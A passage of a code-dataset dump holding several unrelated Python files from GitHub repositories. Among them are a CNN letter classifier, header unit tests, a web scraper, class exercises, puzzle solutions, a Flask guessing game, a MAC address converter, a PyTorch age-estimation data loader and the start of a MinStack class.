plot_preprocessed_images(images):\n width = 5\n height = math.ceil(len(images) / width)\n\n f, ax = plt.subplots(2,5) \n f.set_size_inches(10, 10)\n k = 0\n\n for i in range(height):\n for j in range(width):\n ax[i,j].imshow(images[k].reshape(28, 28) , cmap = \"gray\")\n k += 1\n plt.tight_layout()\n plt.show()\n\n\ndef show_accuracy_graph(model, history):\n epochs = [i for i in range(EPOCHS)]\n fig , ax = plt.subplots(1,2)\n train_acc = history.history['accuracy']\n train_loss = history.history['loss']\n val_acc = history.history['val_accuracy']\n val_loss = history.history['val_loss']\n fig.set_size_inches(16,9)\n\n ax[0].plot(epochs , train_acc , 'go-' , label = 'Training Accuracy')\n ax[0].plot(epochs , val_acc , 'ro-' , label = 'Testing Accuracy')\n ax[0].set_title('Training & Validation Accuracy')\n ax[0].legend()\n ax[0].set_xlabel(\"Epochs\")\n ax[0].set_ylabel(\"Accuracy\")\n\n ax[1].plot(epochs , train_loss , 'g-o' , label = 'Training Loss')\n ax[1].plot(epochs , val_loss , 'r-o' , label = 'Testing Loss')\n ax[1].set_title('Testing Accuracy & Loss')\n ax[1].legend()\n ax[1].set_xlabel(\"Epochs\")\n ax[1].set_ylabel(\"Loss\")\n plt.show()\n\n\ndef show_confusion_matrix(y, predictions):\n cm = confusion_matrix(y, predictions)\n cm = pd.DataFrame(cm , index = [i for i in range(25) if i != 9] , columns = [i for i in range(25) if i != 9])\n plt.figure(figsize = (15,15))\n sns.heatmap(cm,cmap= \"Blues\", linecolor = 'black' , linewidth = 1 , annot = True, fmt='')\n\n\ndef show_predicted_to_correct_classes(x_test, y, predictions, count=6):\n correct = np.nonzero(predictions == y)[0]\n\n i = 0\n for c in correct[:count]:\n plt.subplot(3,2,i+1)\n plt.imshow(x_test[c].reshape(28,28), cmap=\"gray\", interpolation='none')\n plt.title(\"Predicted {}/Actual {}\".format(CASES[predictions[c]], CASES[y[c]]))\n plt.tight_layout()\n i += 1\n plt.show()\n \n\ndef save_model_history(model, history, model_path=\"model.model\",\n history_path=\"history.history\"):\n # model\n model.save(model_path)\n\n # history\n with open(history_path, \"wb\") as f:\n pickle.dump(history, f)\n\n\ndef read_model_history(model_path=\"model.model\",\n history_path=\"history.history\"):\n try:\n # model\n model = keras.models.load_model(model_path)\n\n # history\n with open(history_path, \"rb\") as f:\n history = pickle.load(f)\n\n return model, history\n except FileNotFoundError:\n return None\n\n\ndef main():\n # preprocessing\n data = list(train_test_split())\n\n # extracts y\n y = data[4]\n del data[4]\n\n data = preprocessing(*data)\n extra_data = augment_data(data[0])\n\n # plot_images(data[0][:10])\n load_from = (MODEL_PATH, HISTORY_PATH)\n # load_from = None\n \n # the actual training\n model, predictions, history, accuracy = train_cnn(*data, extra_data,\n load_from=load_from)\n\n # saves model/history\n save_model_history(model, history, model_path=MODEL_PATH,\n history_path=HISTORY_PATH)\n\n # shows graphs\n # show_accuracy_graph(model, history)\n # show_confusion_matrix(y, predictions)\n # show_predicted_to_correct_classes(data[2], y, predictions)\n\n\nclass RoverCNN:\n CASES = {index:letter.upper() for index,letter in enumerate(string.ascii_lowercase)}\n\n\n def __init__(self,\n epochs = 4,\n model_path = \"piccolo/model.pickle\",\n history_path = \"piccolo/history.pickle\",\n ):\n # config vals\n self.epochs = epochs\n self.model_path = model_path\n self.history_path = history_path\n\n # gets train/test data\n self.x_train, self.y_train, self.x_test, self.y_test, self.y = train_test_split()\n # preprocesses it\n self.x_train, self.y_train, self.x_test, self.y_test = preprocessing(*self.data)\n\n # # data augmentation\n self.extra_data = augment_data(self.x_train)\n # plt.imshow(self.x_train[0], interpolation='nearest')\n # plt.show()\n\n self.get_model()\n\n\n @property\n def data(self):\n return [self.x_train, self.y_train, self.x_test, self.y_test]\n\n def get_model(self):\n self.model, self.predictions, self.history, self.accuracy = \\\n train_cnn(*self.data, self.extra_data, load_from=(self.model_path,\n self.history_path))\n\n def save(self):\n save_model_history(self.model, self.history,\n model_path=self.model_path,\n history_path=self.history_path)\n\n def predict(self, image):\n print(\"PREDICTOR\", image.shape, len(image))\n processed_image = image / 255\n processed_image = processed_image.reshape(-1,28,28,1)\n # processed_image = processed_image.reshape(1920,480,1)\n results = self.model.predict(processed_image)[0]\n return CASES[list(results).index(max(results))]\n\n def show_graphs(self):\n show_accuracy_graph(self.model, self.history)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Zaqttack/hackrover.tech-ml","sub_path":"rover_cnn.py","file_name":"rover_cnn.py","file_ext":"py","file_size_in_byte":9702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71074631788","text":"import unittest\nimport requests\nfrom utils.common.config_loader import ConfigLoader\nfrom luna_admin.crutches_on_wheels.utils.regexps import REQUEST_ID_REGEXP\nfrom time import time, timezone\n\n\nLPS_ADMIN_URL = ConfigLoader.get_admin_url()\n\n\nclass TestHeaders(unittest.TestCase):\n \"\"\"\n Test headers\n \"\"\"\n def test_check_custom_luna_req_id(self):\n \"\"\"\n .. test:: test_check_custom_luna_req_id\n\n :resources: \"/\"\n :description: success setting LUNA-Request-Id\n :LIS: No\n :tag: Headers\n \"\"\"\n requestId = \"{},{}\".format(int(time()), \"11111111-1111-4a11-8111-111111111111\")\n replyInfo = requests.get(url=LPS_ADMIN_URL, headers={\"LUNA-Request-Id\": requestId})\n self.assertEqual(replyInfo.headers[\"LUNA-Request-Id\"], requestId)\n\n def test_check_luna_req_id(self):\n \"\"\"\n .. test:: test_check_luna_req_id\n\n :description: success getting LUNA-Request-Id\n :LIS: No\n :tag: Headers\n :resources: \"/\"\n \"\"\"\n replyInfo = requests.get(url=LPS_ADMIN_URL)\n self.assertIn(\"LUNA-Request-Id\", replyInfo.headers)\n rid = replyInfo.headers['LUNA-Request-Id']\n requestId = rid.split(\",\")\n self.assertTrue(abs(time()-timezone-int(requestId[0])) < 2, \"too much difference between time\")\n self.assertEqual(len(requestId[1]), 36)\n\n def test_check_custom_bad_luna_req_id(self):\n\n \"\"\"\n .. test:: test_check_custom_bad_luna_req_id\n\n :resources: \"/\"\n :description: bad setting LUNA-Request-Id\n :LIS: No\n :tag: Headers\n \"\"\"\n requestId = \"{},{}\".format(int(time()), \"11111111-1111-4a11-8111-111111111111x\")\n replyInfo = requests.get(url = LPS_ADMIN_URL, headers = {\"LUNA-Request-Id\": requestId})\n self.assertTrue(replyInfo.headers[\"LUNA-Request-Id\"] != requestId)\n self.assertTrue(REQUEST_ID_REGEXP.match(replyInfo.headers[\"LUNA-Request-Id\"]) is not None)\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-admin/tests/tests_api/unitests_headers.py","file_name":"unitests_headers.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41850837963","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom utils.scalex_toolkit import ScaleXToolkit, get_unit\n\n\nclass AwaserToolkit(ScaleXToolkit):\n FIBER_HOME_URL = \"https://awasr.om/en/package/journey/ZVANH\"\n\n def get_download_speed(self, scope_html):\n download_speed_value = scope_html.select_one(\"span.currency\")\n dwonload_speed_unit = scope_html.select_one(\"span.mo\")\n download_speed = {\"value\": float(\n download_speed_value.text), \"unit\": get_unit(dwonload_speed_unit.text)}\n return self.unify_unit(download_speed)\n\n def get_price(self, scope_html):\n price = scope_html.select_one(\"p.price\")\n return self.split_value_and_unit(self.clear_string(price.text))\n\n def get_other(self, scope_html):\n other = []\n promotions = scope_html.select_one(\n \"div.service-plan-content.text-direction\")\n li = promotions.find_all(\"li\")\n for l in li:\n if \"Get Increased\" not in l.text:\n other.append(self.clear_string(l.text))\n return other\n\n def get_soup(self, URL):\n res = requests.get(URL)\n txt = res.text\n soup = BeautifulSoup(txt, features=\"html.parser\")\n return soup\n","repo_name":"alkuyomisb/scalex_engine","sub_path":"data/web_scrapping/isp/awaser/awaser_tookit.py","file_name":"awaser_tookit.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"49951499","text":"#!/usr/bin/python3\n\"\"\"This module Write a class Square that defines a square\"\"\"\n\n\nclass Square:\n \"\"\"Simple class of a square\"\"\"\n\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"Initialize the square.\n\n Arg:\n size (int): size of the square.\n position (tuple): position of the square\n \"\"\"\n\n self.__size = size\n self.__position = position\n\n @property\n def size(self):\n \"\"\"Make getter for my square size\"\"\"\n return (self.__size)\n\n @size.setter\n def size(self, value):\n \"\"\"setter for size.\n\n Arg:\n value (int): value to set size of the square.\n \"\"\"\n\n if type(value) is int and value >= 0:\n self.__size = value\n elif type(value) is not int:\n raise TypeError(\"size must be an integer\")\n elif value < 0:\n raise ValueError(\"size must be >= 0\")\n\n @property\n def position(self):\n \"\"\"Make getter for my square position\"\"\"\n return (self.__position)\n\n @position.setter\n def position(self, value):\n \"\"\"setter for position.\n\n Arg:\n value (tuple): value to set size of the square.\n \"\"\"\n\n if type(value) is tuple and len(value) == 2 and type(value[0]) is int:\n if isinstance(value[1], int) and value[0] >= 0 and value[1] >= 0:\n self.__position = value\n else:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n\n def area(self):\n \"\"\"Compute the square\n\n Returns:\n int: current square area\n \"\"\"\n return (self.__size * self.__size)\n\n def my_print(self):\n \"\"\" prints in stdout the square with the character #\"\"\"\n if self.__size > 0:\n for y in range(0, self.__position[1]):\n print()\n for a in range(0, self.__size):\n print(\" \" * self.__position[0], end=\"\")\n for b in range(0, self.__size):\n print(\"#\", end=\"\")\n print()\n elif self.__size == 0:\n print()\n","repo_name":"samuelolushegun/alx-higher_level_programming","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41232915470","text":"'''시간초과'''\nimport sys, copy\n\ninput = sys.stdin.readline\nm, s = map(int, input().split())\nfishes = []\nfor _ in range(m):\n x, y, d = list(map(int, input().split()))\n fishes.append([x-1, y-1, d-1])\n\ncp_fishes = []\nshark_pos = list(map(int, input().split())) \nshark_pos = shark_pos[0]-1, shark_pos[1]-1\n\nspace, smell = [], [] \nfor i in range(4):\n line_1, line_2 = [], []\n for j in range(4):\n line_1.append([])\n line_2.append([])\n space.append(line_1)\n smell.append(line_2)\n\nfish_direction = [(0,-1), (-1,-1), (-1,0), (-1,1), (0,1), (1,1), (1,0), (1,-1)]\nshark_direction = [(-1,0), (0,-1), (1,0), (0,1)]\n\ndef fish_move(): \n size = len(fishes)\n for _ in range(size):\n x, y, d = fishes.pop(0)\n for i in range(8):\n nx, ny = x + fish_direction[d-i][0], y + fish_direction[d-i][1]\n if (0 <= nx and nx < 4 and 0 <= ny and ny < 4) and shark_pos != [nx,ny] and not smell[nx][ny]:\n # 이동\n space[x][y].remove(d)\n space[nx][ny].append((d-i)%8)\n fishes.append([nx, ny, (d-i)%8])\n break\n else:\n fishes.append([x, y, d])\n\ndef dfs(cases, x, y, depth, path, path_fishes, visited):\n if depth == 3:\n cases.append([\"\".join(path), path_fishes])\n return\n\n for i in range(4):\n nx, ny = x + shark_direction[i][0], y + shark_direction[i][1]\n\n if 0 <= nx < 4 and 0 <= ny < 4:\n if not visited[nx][ny]:\n visited[nx][ny] = True\n temp = []\n for f in space[nx][ny]:\n temp.append(f)\n dfs(cases, nx, ny, depth+1, path+[str(i+1)], path_fishes+len(temp), visited) \n visited[nx][ny] = False\n else:\n dfs(cases, nx, ny, depth+1, path+[str(i+1)], path_fishes, visited)\n \ndef shark_move(idx):\n global shark_pos\n path = []\n cases = []\n x, y = shark_pos[0], shark_pos[1]\n visited = [[0]*4 for _ in range(4)]\n\n dfs(cases, x,y,0,[],0,visited)\n cases.sort(key=lambda x: (-x[1], x[0]))\n\n x, y = shark_pos[0], shark_pos[1]\n path = list(cases[0][0])\n for i, p in enumerate(path):\n p = int(p)-1\n nx, ny = x + shark_direction[p][0], y + shark_direction[p][1]\n x, y = nx, ny\n if 0 < len(space[x][y]):\n smell[x][y].append(idx)\n space[x][y] = []\n remove_list = []\n for f in fishes:\n if [f[0],f[1]] == [x,y]:\n remove_list.append(f)\n for r in remove_list:\n fishes.remove(r)\n \n if i == 2:\n shark_pos = [x,y]\n\ndef duplicate(idx):\n cp_fishes = copy.deepcopy(fishes)\n # 1. 모든 물고기 한 칸 이동\n fish_move()\n # 2. 상어 이동\n shark_move(idx)\n # 3. 물고기 냄새 사라짐\n for i in range(4):\n for j in range(4):\n if idx-2 in smell[i][j]:\n smell[i][j].remove(idx-2)\n # 4. 복제 물고기 생성\n for x, y, d in cp_fishes:\n space[x][y].append(d)\n fishes.append([x,y,d])\n\ndef count_fishes():\n cnt = 0\n for i in range(4):\n for j in range(4):\n cnt += len(space[i][j])\n return cnt\n\n# main\nfor x, y, d in fishes:\n space[x][y].append(d)\n\nfor i in range(s):\n duplicate(i)\n \nprint(count_fishes())\n\n'''other solution'''\nimport sys, copy\n\ninput = sys.stdin.readline\nm, s = map(int, input().split())\nfish = [list(map(int, input().split())) for _ in range(m)]\nspace = [[[] for _ in range(4)] for _ in range(4)]\n\nfor x, y, d in fish:\n space[x - 1][y - 1].append(d - 1)\n\nshark = tuple(map(lambda x: int(x) - 1, input().split()))\nsmell = [[0] * 4 for _ in range(4)]\n\nf_dx = [0, -1, -1, -1, 0, 1, 1, 1]\nf_dy = [-1, -1, 0, 1, 1, 1, 0, -1]\ndx = [-1, 0, 1, 0]\ndy = [0, -1, 0, 1]\n\ndef move_fish():\n res = [[[] for _ in range(4)] for _ in range(4)]\n for x in range(4):\n for y in range(4):\n while temp[x][y]:\n d = temp[x][y].pop()\n for i in range(d, d - 8, -1):\n i %= 8\n nx, ny = x + f_dx[i], y + f_dy[i]\n if (nx, ny) != shark and 0 <= nx < 4 and 0 <= ny < 4 and not smell[nx][ny]:\n res[nx][ny].append(i)\n break\n else:\n res[x][y].append(d)\n return res\n\ndef dfs(x, y, dep, cnt, visit):\n global max_eat, shark, eat\n if dep == 3: \n if max_eat < cnt:\n max_eat = cnt\n shark = (x, y)\n eat = visit[:]\n return\n for d in range(4):\n nx = x + dx[d]\n ny = y + dy[d]\n if 0 <= nx < 4 and 0 <= ny < 4:\n if (nx, ny) not in visit: \n visit.append((nx, ny))\n dfs(nx, ny, dep + 1, cnt + len(temp[nx][ny]), visit)\n visit.pop()\n else: \n dfs(nx, ny, dep + 1, cnt, visit)\n\nfor _ in range(s):\n eat = list()\n max_eat = -1\n # 1. 모든 물고기 복제\n temp = copy.deepcopy(space)\n # 2. 물고기 이동\n temp = move_fish()\n # 3. 상어이동 - 백트래킹\n dfs(shark[0], shark[1],0, 0, list())\n # 4. 냄새 사라짐 \n for i in range(4):\n for j in range(4):\n if smell[i][j]:\n smell[i][j] -= 1\n for x, y in eat:\n if temp[x][y]:\n temp[x][y] = []\n smell[x][y] = 2 \n # 5. 복제 마법\n for i in range(4):\n for j in range(4):\n space[i][j] += temp[i][j]\n\n# 물고기 수 구하기 \nanswer = 0\nfor i in range(4):\n for j in range(4):\n answer += len(space[i][j])\n\nprint(answer)","repo_name":"suzyrhkr/Algorithm-PS","sub_path":"samsung-sw/마법사상어와복제.py","file_name":"마법사상어와복제.py","file_ext":"py","file_size_in_byte":5716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24127617040","text":"from flask import Flask, render_template, request, redirect, session\nimport random\napp = Flask(__name__)\napp.secret_key = \"number_game\"\n@app.route(\"/\") #display route, for index\ndef index():\n # all functions must return a redirect or a render_template at the end of them to exit the function\n #checks to see if there is a random number in session\n if \"win_number\" not in session:\n #if there isnt, then make a random number\n session[\"win_number\"] = random.randint(1,101)\n elif session[\"win_number\"] == session[\"guess\"]:\n #if there is a win number, then pop all things stored in session\n session.pop(\"win_number\")\n session.pop(\"guess\")\n session.pop(\"test\")\n return redirect(\"/\") #redirect to index\n return render_template(\"index.html\")\n@app.route(\"/guess\", methods=[\"POST\"]) #calculations route\ndef guess():\n session[\"guess\"] = int(request.form[\"guess\"]) # this is setting the guess provided from the user form and storing it into session, also changes the input to an int\n if session[\"guess\"] == session[\"win_number\"]: #\n session[\"test\"] = \"Congrats! \" + str(session[\"win_number\"]) + \" was the number!\" # if the guess is right then print out a string and display the Play Again\n # button from the index.html\n return redirect(\"/repeat\") # redirect to /repeat which renders template of index again\n if session[\"guess\"] > session[\"win_number\"]: # if the guess is higher than the win number, then test will print \"too high\"\n session[\"test\"] = \"Too High!\"\n if session[\"guess\"] < session[\"win_number\"]: # if the guess is lower than the win number, then test will print \"too low\"\n session[\"test\"] = \"Too Low!\"\n return redirect(\"/\") # redirect to /repeat which renders template of index again\n@app.route(\"/repeat\") #display route\ndef repeat():\n return render_template(\"index.html\")# renders template of index again\napp.run(debug=True)\n","repo_name":"jackiethind/DojoAssignments","sub_path":"Python/Flask_Fundamentals/great_number_game/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71604233067","text":"import os, sys, shutil, csv\nimport random as rd\nfrom PIL import Image\nimport numpy as np\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as data\nfrom torch.autograd import Variable\nfrom torch.nn.modules.loss import _WeightedLoss\nimport random\nimport cv2\nimport imgaug as ia\nimport imgaug.augmenters as iaa\n\nRootDir = {'C':'/ssd2/baozenghao/data/Age/CACD/CACD2000_arccropped/',\n 'E':'/ssd1/data/face/age_data/data/MegaAge/megaage_asian_arccropped/',\n 'I':'/ssd1/baozenghao/data/IMDB-WIKI/',\n 'LO':'/ssd2/baozenghao/data/Age/CLAP16/CLAP16_arccrop/',\n 'L':'/ssd2/baozenghao/data/Age/CLAP16/CLAP16_arccrop/train/',\n 'LT':'/ssd2/baozenghao/data/Age/CLAP16/train/',\n 'MS': '/ssd2/data/face/MS_Celeb_1M/imgs',\n 'G': '/ssd2/data/face/Glint360k/imgs',\n 'M':'/ssd1/data/face/age_data/data/Morph/Album2_arccropped/',\n 'U': '/ssd1/data/face/age_data/data/UTKFace/UTKFACE_arccropped/'}\n\nAllTrain = {'C': '/ssd2/baozenghao/data/Age/CACD/txt/big_noise_images_shuffle_renamed.txt',\n 'E': '/ssd1/data/face/age_data/data/MegaAge/txt/MegaAge_Asian_train.txt',\n 'I': '/ssd1/baozenghao/data/IMDB-WIKI/txt/imdb_wiki_CLEAN_train.txt',\n 'L': '/ssd2/baozenghao/data/Age/CLAP16/txt/train.txt',\n 'LT': '/ssd2/baozenghao/data/Age/CLAP16/txt/train.txt',\n 'MS': '/ssd2/data/face/MS_Celeb_1M/txt/list.txt',\n 'G': '/ssd2/data/face/Glint360k/txt/list.txt',\n 'M': '/ssd1/data/face/age_data/data/Morph/txt/RANDOM_80_20/morph_random_80_20_train.txt',\n 'U': '/ssd1/data/face/age_data/data/UTKFace/txt/utkface_train.txt'}\n\nAllTest = {'C': '/ssd2/baozenghao/data/Age/CACD/txt/small_noise_images_rank345_renamed.txt',\n 'E': '/ssd1/data/face/age_data/data/MegaAge/txt/MegaAge_Asian_test.txt',\n 'I': '/ssd1/baozenghao/data/IMDB-WIKI/txt/imdb_wiki_CLEAN_test.txt',\n 'LO': '/ssd2/baozenghao/data/Age/CLAP16/txt/chalearn16_AG_test.txt',\n 'LT': '/ssd2/baozenghao/data/Age/CLAP16/txt/chalearn16_AG_test.txt',\n 'M': '/ssd1/data/face/age_data/data/Morph/txt/RANDOM_80_20/morph_random_80_20_test.txt',\n 'U': '/ssd1/data/face/age_data/data/UTKFace/txt/utkface_test.txt'}\n\nrootdir = '/ssd2/baozenghao/data/Age/MIVIA/caip_arccropped'\ntrainlist = '/ssd2/baozenghao/data/Age/MIVIA/MIVIA_train.csv'\n# trainlist = '/ssd2/baozenghao/data/Age/MIVIA/training_caip_contest.csv'\ntestlist = '/ssd2/baozenghao/data/Age/MIVIA/MIVIA_test.csv'\n# testlist = '/bzh/test.csv'\n\n#cutout transform\nclass CutoutDefault(object):\n \"\"\"\n Apply cutout transformation.\n Code taken from: https://github.com/quark0/darts/blob/master/cnn/utils.py\n \"\"\"\n def __init__(self, length):\n self.length = length\n\n def __call__(self, img):\n h, w = img.size(1), img.size(2)\n mask = np.ones((h, w), np.float32)\n y = np.random.randint(h)\n x = np.random.randint(w)\n\n y1 = np.clip(y - self.length // 2, 0, h)\n y2 = np.clip(y + self.length // 2, 0, h)\n x1 = np.clip(x - self.length // 2, 0, w)\n x2 = np.clip(x + self.length // 2, 0, w)\n\n mask[y1: y2, x1: x2] = 0.\n mask = torch.from_numpy(mask)\n mask = mask.expand_as(img)\n img *= mask\n return img\n\ndef loadcsv(data_dir, file):\n imgs = list()\n with open(file, mode='r') as csv_file:\n gt = csv.reader(csv_file, delimiter=',')\n for row in gt:\n img_name, age = row[0], row[1]\n img_path = os.path.join(data_dir, img_name)\n age = int(round(float(age)))\n imgs.append((img_path, age))\n return imgs\n\n# def loadclass(data_dir, file):\n\n\ndef loadrank(data_dir, file, rank):\n imgs = list()\n with open(file, mode='r') as csv_file:\n gt = csv.reader(csv_file, delimiter=',')\n for row in gt:\n img_name, age = row[0], row[1]\n img_path = os.path.join(data_dir, img_name)\n age = int(round(float(age)))\n if age > 10 * rank and age <= 10 * (rank + 1) and rank != 7:\n imgs.append((img_path, age))\n if rank == 7 and age > 10 * rank:\n imgs.append((img_path, age))\n return imgs\n\n\n\ndef loadage(data_dir, file, shuffle=True):\n imgs = list()\n with open(file) as f:\n for eachline in f:\n contents = eachline.strip().split(' ')\n img_name, age = contents[0], contents[1]\n img_path = os.path.join(data_dir, img_name)\n age = int(round(float(age)))\n # if age > 15 and age < 61:#16--60\n imgs.append((img_path, age))\n if shuffle:\n random.shuffle(imgs)\n return imgs\n\ndef loadface(data_dir, image_list_file):\n imgs = list()\n with open(image_list_file) as f:\n for eachline in f:\n contents = eachline.strip().split('/')\n label, img_name = contents[0], contents[1]\n img_path = os.path.join(data_dir, label, img_name)\n label = int(label[3:])\n imgs.append((img_path, label))\n return imgs\n\ndef normal_sampling(mean, label_k, std=1):\n return math.exp(-(label_k-mean)**2/(2*std**2))/(math.sqrt(2*math.pi)*std)\n\nclass Balance(data.Dataset):\n def __init__(self, transform):\n imgs = loadcsv(rootdir, trainlist) \n self.transform = transform\n self.class_dict = self._get_class_dict()\n self.imgs = imgs\n def _get_class_dict(self):\n class_dict = dict()\n for i in range(1,82):\n class_dict[str(i)] = []\n with open(trainlist, mode='r') as csv_file:\n gt = csv.reader(csv_file, delimiter=',')\n for i, row in enumerate(gt):\n age = int(round(float(row[1])))\n for j in range(1, 82):\n if age == j:\n class_dict[str(j)].append(i)\n return class_dict\n\n def __getitem__(self, index):\n sample_class = random.randint(1, 81)\n sample_indexes = self.class_dict[str(sample_class)]\n index = random.choice(sample_indexes)\n \n img_path, age = self.imgs[index]\n age = int(round(float(age)))\n img_path = os.path.join(rootdir, img_path)\n\n img = Image.open(img_path).convert(\"RGB\")\n\n label = [normal_sampling(int(age), i) for i in range(101)]\n label = [i if i > 1e-15 else 1e-15 for i in label]\n label = torch.Tensor(label)\n\n seq_rand = iaa.Sequential([iaa.RandAugment(n=2, m=10)])\n\n cv_img = cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)\n cv_img = seq_rand.augment_image(image=cv_img)\n img = Image.fromarray(cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB))\n\n img = self.transform(img)\n return img, age, label\n\n def __len__(self):\n return len(self.imgs)\n\n\nclass TrainM(data.Dataset):\n def __init__(self, transform):\n imgs = loadcsv(rootdir, trainlist) \n random.shuffle(imgs)\n self.imgs = imgs\n self.transform = transform\n def __getitem__(self, item):\n img_path, age = self.imgs[item]\n img = Image.open(img_path).convert(\"RGB\")\n\n label = [normal_sampling(int(age), i) for i in range(101)]\n label = [i if i > 1e-15 else 1e-15 for i in label]\n label = torch.Tensor(label)\n\n seq_rand = iaa.Sequential([iaa.RandAugment(n=2, m=10)])\n\n cv_img = cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)\n cv_img = seq_rand.augment_image(image=cv_img)\n img = Image.fromarray(cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB))\n\n # self.transform.transforms.append(CutoutDefault(20))\n\n img = self.transform(img)\n return img, age, label\n def __len__(self):\n return len(self.imgs)\n\nclass TestM(data.Dataset):\n def __init__(self, transform):\n imgs = loadcsv(rootdir, testlist) \n self.imgs = imgs\n self.transform = transform\n def __getitem__(self, item):\n img_path, age = self.imgs[item]\n img = Image.open(img_path).convert(\"RGB\")\n # img2 = img.transpose(Image.FLIP_LEFT_RIGHT)\n img = self.transform(img)\n # img2 = self.transform(img2)\n return img, age\n def __len__(self):\n return len(self.imgs)\n\nclass Face(data.Dataset):\n def __init__(self, dataset, InTrain, transform):\n if InTrain:\n imgs = loadface(RootDir[dataset], AllTrain[dataset]) \n UsedImages = imgs\n random.shuffle(UsedImages)\n else:\n imgs = loadface(RootDir[dataset], AllTest[dataset])\n UsedImages = imgs\n self.imgs = UsedImages\n self.transform = transform\n self.InTrain = InTrain\n def __getitem__(self, item):\n img_path, label = self.imgs[item]\n img = Image.open(img_path).convert(\"RGB\")\n img = self.transform(img)\n return img, label\n def __len__(self):\n return len(self.imgs)\n\nclass AAR(data.Dataset):\n def __init__(self, transform, rank):\n imgs = loadrank(rootdir, testlist, rank) \n self.imgs = imgs\n self.transform = transform\n def __getitem__(self, item):\n img_path, age = self.imgs[item]\n img = Image.open(img_path).convert(\"RGB\")\n img = self.transform(img)\n return img, age\n def __len__(self):\n return len(self.imgs)\n\nclass Train(data.Dataset):\n def __init__(self, dataset, transform):\n imgs = loadage(RootDir[dataset], AllTrain[dataset]) \n UsedImages = imgs\n random.shuffle(UsedImages)\n self.imgs = UsedImages\n self.transform = transform\n def __getitem__(self, item):\n img_path, age = self.imgs[item]\n img = Image.open(img_path).convert(\"RGB\")\n\n label = [normal_sampling(int(age), i) for i in range(101)]\n label = [i if i > 1e-15 else 1e-15 for i in label]\n label = torch.Tensor(label)\n\n # seq_rand = iaa.Sequential([iaa.RandAugment(n=2, m=9)])\n\n # cv_img = cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)\n # cv_img = seq_rand.augment_image(image=cv_img)\n # img = Image.fromarray(cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB))\n\n img = self.transform(img)\n return img, age, label\n def __len__(self):\n return len(self.imgs)\n\nclass Test(data.Dataset):\n def __init__(self, dataset, transform):\n imgs = loadage(RootDir[dataset], AllTest[dataset])\n UsedImages = imgs\n self.imgs = UsedImages\n self.transform = transform\n def __getitem__(self, item):\n img_path, age = self.imgs[item]\n img = Image.open(img_path).convert(\"RGB\")\n img = self.transform(img)\n return img, age\n def __len__(self):\n return len(self.imgs)\n","repo_name":"Defiler24/GTA","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":10765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40949787587","text":"\nfrom pprint import pprint\nimport re\n\n\ndef convert_mac(mac_address):\n regex = re.compile(\n r\"[0-9a-f]{4}[.:-][0-9a-f]{4}[.:-][0-9a-f]{4}\"\n r\"|([0-9a-f]{2}[.:-]){5}[0-9a-f]{2}\"\n r\"|[0-9a-f]{12}\",\n re.IGNORECASE\n )\n if regex.fullmatch(str(mac_address)):\n mac = re.sub(r\"[-.:]\", \"\", mac_address)\n else:\n raise ValueError(f\"'{mac_address}' does not appear to be a MAC address\")\n\n new_mac = [mac[index : index + 2] for index in range(0, len(mac), 2)]\n return \":\".join(new_mac)\n\n\nif __name__ == \"__main__\":\n pprint(convert_mac(\"1a1b.2c2d.3e3f\"))\n pprint(convert_mac(\"111122223333\"))\n pprint(convert_mac(\"1111-2222-3333\"))\n\n\n","repo_name":"natenka/pyneng-tasks-solutions","sub_path":"answers/15_module_re/task_15_6.py","file_name":"task_15_6.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70399044909","text":"# Min Stack - https://leetcode.com/problems/min-stack/\nclass MinStack(object):\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.stack = []\n self.heap = []\n self.stackToHeap = {}\n self.heapToStack = {}\n \n def push(self, x):\n \"\"\"\n :type x: int\n :rtype: void\n \"\"\"\n self.stack.append(x)\n self.heap.append(x)\n ix = len(self.heap) - 1\n self.stackToHeap[ix] = ix\n self.heapToStack[ix] = ix\n pix = self.getParentIndex(ix)\n while self.heap[ix] < self.heap[pix]:\n self.exchangeHeap(ix, pix)\n ix = pix\n pix = self.getParentIndex(ix)\n \n def pop(self):\n \"\"\"\n :rtype: void\n \"\"\"\n last_ix = len(self.stack) - 1\n ix = self.stackToHeap[last_ix]\n self.exchangeHeap(ix, last_ix)\n del self.stackToHeap[last_ix]\n del self.heapToStack[last_ix]\n self.heap.pop()\n item = self.stack.pop()\n if ix == last_ix:\n return item\n nix = None\n while nix != ix:\n nix = self.getMinValueIndex(ix)\n self.exchangeHeap(nix, ix)\n ix = nix\n return item\n \n def getMinValueIndex(self, pix):\n ix = pix\n v = self.heap[pix]\n lix = 2 * pix + 1\n lv = self.tryGetHeapValue(lix)\n if lv is not None and lv < v:\n v = lv\n ix = lix\n rix = 2 * pix + 2\n rv = self.tryGetHeapValue(rix)\n if rv is not None and rv < 